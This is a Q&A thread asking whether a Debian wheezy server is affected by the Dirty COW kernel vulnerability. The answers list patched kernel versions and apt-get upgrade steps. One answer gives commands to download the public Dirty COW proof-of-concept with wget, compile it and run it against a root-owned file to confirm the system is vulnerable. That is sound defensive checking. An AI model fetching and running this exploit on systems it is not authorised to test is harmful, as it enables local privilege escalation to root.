# How to make sure that my operating system is not affected by CVE-2016-5195 (Dirty COW)?

Tags: linux, dirty-cow

I am running following version of Linux operating system.

```
Distributor ID: Debian
Description:    Debian GNU/Linux 7.2 (wheezy)
Release:        7.2
Codename:       wheezy
```

I am not sure whether this version is affected by [CVE-2016-5195](https://dirtycow.ninja/)

Can some one help me out to clear my doubt?

**Update** : After running the command mentioned by *AliCelebi* I get following

```
3.2.28-cerberhost-0.6-modules-grsec
```

Comment: Just use Windows.

Comment: So perhaps this is on a VPS, with the OS installed by the VPS provider?  Perhaps its time to call customer support.

Comment: After apt-get update && apt-get upgrade && apt-get dist-upgrade, make sure to reboot the box

Comment: @StackOverflowed Windows doesn't have good fonts and does have BSOD, so even better is to use OS X aka macOS

Comment: @SargeBorsch \*cough\* who cares about BSOD? It's a privacy nightmare in the first place.

Comment: I think anyone who took my suggestion seriously... shouldn't have.

Comment: @StackOverflowed Sadly, nuances of humor/sarcasm/etc don't convey themselves well when transcribed without additional cues that are normally non-verbal, and will inevitably be misconstrued given a broad-enough audience, especially when it's at all conceivable that a person somewhere in the world could make such a statement seriously.

Answer (score 19, accepted):

You can do `uname -rv` to find out your Linux kernel version. You will get an output similar to below:

```
4.4.0-42-generic #62-Ubuntu SMP Fri Oct 7 23:11:45 UTC 2016
```

If your version is earlier than the following, you are affected:

- 4.8.0-26.28 for Ubuntu 16.10
- 4.4.0-45.66 for Ubuntu 16.04 LTS
- 3.13.0-100.147 for Ubuntu 14.04 LTS
- 3.2.0-113.155 for Ubuntu 12.04 LTS
- 3.16.36-1+deb8u2 for Debian 8
- 3.2.82-1 for Debian 7
- 4.7.8-1 for Debian unstable

Comment: The command shows:  3.2.28-cerberhost-0.6-modules-grsec

Comment: It appears that your system is vulnerable to Dirty CoW. You can upgrade your Linux Kernel to stay protected against this vulnerability.

Answer (score 5):

According to [security-tracker.debian](https://security-tracker.debian.org/tracker/CVE-2016-5195), You need to run `uname -a` and verify your current kernel version .

```
wheezy  3.2.78-1                        vulnerable
wheezy (security)   3.2.82-1            fixed
jessie  3.16.36-1+deb8u1                vulnerable
jessie (security)   3.16.36-1+deb8u2    fixed
stretch, sid    4.7.8-1                 fixed
```

This vulnerability is patched under debian , by upgrading your system :

```
apt-get update
apt-get upgrade
apt-get dist-upgrade
```

**Edit**

> How to make sure that my operating system is not affected by CVE-2016-5195?

You can try the following [tutorial.](http://www.cyberciti.biz/faq/dirtycow-linux-cve-2016-5195-kernel-local-privilege-escalation-vulnerability-fix/)

Download the exploit.

```
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
```

As root : Create the `foo` file:

```
su
echo this is not a test > foo
```

As user :

```
gcc -lpthread dirtyc0w.c -o dirtyc0w
gcc -pthread dirtyc0w.c -o dirtyc0w
./dirtyc0w foo m00000000000000000
```

Verify your file:

```
cat foo
```

On vulnerable machine you will get `m00000000000000000` as output.